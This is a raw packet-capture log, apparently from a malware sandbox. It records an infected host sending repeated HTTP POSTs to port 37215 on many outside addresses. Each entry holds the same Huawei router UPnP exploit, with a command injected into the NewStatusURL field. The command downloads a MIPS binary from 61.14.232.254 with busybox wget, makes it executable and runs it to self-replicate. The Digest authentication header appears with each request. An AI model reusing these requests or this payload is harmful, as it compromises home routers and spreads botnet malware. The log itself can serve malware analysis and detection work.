                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1939192.168.2.1358726197.93.165.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683619022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1940192.168.2.1356044157.65.78.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683640003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1941192.168.2.135080841.164.16.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683677912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1942192.168.2.1333980157.198.165.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683759928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1943192.168.2.1354610197.42.126.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683785915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1944192.168.2.1352138184.246.55.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683789015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1945192.168.2.1348622157.70.74.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683811903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1946192.168.2.1333866157.210.237.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683971882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1947192.168.2.134061041.239.116.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683981895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1948192.168.2.134874664.89.105.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684021950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
